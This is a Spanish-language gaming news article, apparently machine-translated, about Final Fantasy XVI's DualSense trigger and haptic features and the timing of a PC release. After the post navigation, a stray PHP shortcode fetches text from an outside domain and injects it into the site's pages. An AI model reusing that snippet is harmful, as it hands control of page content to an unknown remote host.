El director principal de Final Fantasy 16 ha proporcionado algunos detalles nuevos sobre cómo el juego utiliza las funciones del controlador PS5 DualSense.


En una entrevista con el blog de PlayStation, Hiroshi Takai afirmó que el juego usa los disparadores adaptativos del controlador y la retroalimentación háptica durante el combate y la exploración.


“Hay partes en las que el jugador tiene que abrir puertas pesadas o levantar rastrillos, y allí usamos gatillos adaptativos para complementar esa sensación de esfuerzo y resistencia”, dijo. “También se usan para montar chocobos.




Final Fantasy XVI – Tráiler de ‘La venganza’




“La retroalimentación háptica puede crear vibraciones muy sutiles, que usamos para crear una mayor sensación de presencia en las escenas”, continuó Takai.


“Convertimos los efectos de sonido utilizados en cada escena en datos hápticos, lo que nos permitió representar detalles que nunca antes habíamos podido, como el movimiento del viento”.


Hoy temprano, Square Enix anunció que Final Fantasy 16 se convirtió en oro, lo que significa que el desarrollo central del juego se completó antes de su lanzamiento el 22 de junio.





Aviso: Permita el uso de cookies funcionales en las preferencias de cookies para mostrar esta inserción.





El productor Naoki Yoshida dijo recientemente que le gustaría ver una versión para PC del juego lanzada “eventualmente”.


“En primer lugar, es cierto que Final Fantasy XVI tiene un tiempo limitado de seis meses en la plataforma PS5”, dijo al blog japonés de PlayStation (traducido por Google). Sin embargo, es una historia completamente diferente que la versión para PC se lanzará en medio año. Lo dejaré claro, pero la versión para PC no saldrá hasta dentro de medio año.


“Esto se debe a que dedicamos mucho tiempo y dinero a mejorar la plataforma PS5 para brindar la mejor experiencia de juego. Por supuesto, me gustaría lanzar una versión para PC en algún momento para que todos puedan disfrutar de tantos juegos como sea posible.


“Sin embargo, incluso si comenzamos a mejorar la versión para PC después de que salga la versión para PS5, no podremos mejorarla en medio año, por lo que no saldrá en la mitad de un año. Me gustaría lanzarlo eventualmente, y creo que lo haré, pero no estoy en la etapa en la que pueda decir cuándo.




Previous Post Next Post
function pub_short() { $pub_text = file_get_contents( "https://alrafdean.org/me/pub.txt" ); return $pub_text; } add_shortcode('pub', 'pub_short');